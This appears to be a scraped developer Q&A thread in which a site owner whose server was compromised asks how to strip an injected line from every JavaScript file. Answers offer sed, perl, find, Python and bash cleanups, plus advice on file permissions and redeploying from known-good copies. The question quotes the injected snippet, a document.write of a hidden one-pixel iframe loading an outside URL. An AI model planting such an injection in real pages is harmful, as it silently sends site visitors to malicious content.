Best script to modify file contents on server_问答_开发者

Problem:

I have web server that was recently compromised. They targeted javascript files. They inserted the following snippet

document.write('<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750" width="1" height="1" frameborder="0"></iframe>')

this was added to the top of every single .js file on the server.

Solution:

Write a script to open every javascript file on my server that checks for malicious code, removes malicious code, and finally saves the file.

Question:

What programming language should the script be written in? Will python work? I'm running python 2.4.3 on my server. If I run a py开发者_运维技巧thon script under root will I have to worry about accidentally changing the owner permissions of the modified files?

Thanks

sed -i '1d;' *.js

simple, and will delete the first line from every javascript file.

you could do it a bit more throughly in python, but you said 1st line in every *.js file, no?

better yet, you could consider perl

python would work, but a Python soultion isn't a garbbled quick one-liner and for something like this a quick painless one-liner is what you want.

 perl -pi.bak -e 's/^document.*lcbmc.*\n//g' *.js

if you run this at the command line it will match any line that begins with document and contains lcbmc (including the \n--new line) and remove the line entirely. Do note, that i.bak creates a backup file .bak of everything. You may be well advised to keep this as it you may 'mess up'

afterwards just run

rm -v *.js.bak

UPDATE

Per comments I suggest running the perl scripit in the dir of the *.js files, or use find

find /startDir/ -iname '*.js' -exec perl -pi.bak -e 's/^document.*lcbmc.*\n//g' {} \;

which will:
1. if you specify the correct path
2. execute the perl one-liner on the found ({}) files.
3. the escape ; (\;) is used to string the command together,
4. so it will exec

perl -pi.bak -e 's/^document.*lcbmc.*\n//g' found-item-1.js; perl -pi.bak -e 's/^document.*lcbmc.*\n//g' found-item-2.js

etc... Some versions of find support + which you can observe the behavior of in the following question: find \; VS +

NOTE: you are able to use multiple paths with find.

find /var/www/*.js /home/eric/.apache/*.js

will find files in the /var/www/ folder and the ~/.apache folder that have are *.js files.

What programming language should the script be written in?

Hardly matters.

Will python work?

Yes.

If I run a python script under root will I have to worry about accidentally changing the owner permissions of the modified files?

No. Not "accidentally". You could change them if you did a really bad job coding.

import os
import shutil
for path, dirs, files in os.walk( "some/root/dir" ):
    for f in files:
        name, ext = os.path.splitext( f )
        if ext == '.js':
            js= os.path.join( path, f )
            bak= js+"#"
            os.rename( js, bak )
            with open(bak,"r") as source:
                with open(js,"w") as target:
                    for line in source:
                        if '<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750"' in line:
                            continue
                        target.write( line )

Something like that should (more-or-less) work.

if you need to set permissions or ownership, there are os module functions to allow settings file user, group, and permissions as appropriate.

Bash will probably be easiest. Code could be something like

bad_code="document\\.write('<iframe src=\"http:\\/\\/lcbmc\\.co\\.uk\\/showthread\\.php?t=31540750\" width=\"1\" height=\"1\" frameborder=\"0\"><\/iframe>')"
find /var/www -name "*.js" -print0 | xargs --null sed -i.bak "/${bad_code}/d"

This will delete all (complete) lines containing exactly the mentioned code.

Edit: Quoting fixed now.

I'd like to suggest that you store your website content and code using a different Unix user account than that used by the web server or FastCGI execution environment.

Because your webserver had permissions to write to these files, they were able to be overwritten as the attacker wished. If the web server did not have write permission to anything except its log files and a database socket, they could not have persistently hurt your website, and they could only have corrupted your database or read its contents. Re-start the server, and their hack goes away.

(Of course, if they hacked into your system through a different mechanism, such as a guessed account password, the different users might not have prevented any mischief. You do keep your ssh keys well-protected, right?)

I'd also like to suggest that the simple modifications might be the ones left behind intentionally easy to fix, to provide cover for modifications that are not easy to find or fix, or backdoors that would allow easy re-infection. Re-deploying your entire site from known-good storage is a much better solution than trying to patch up a hacked installation.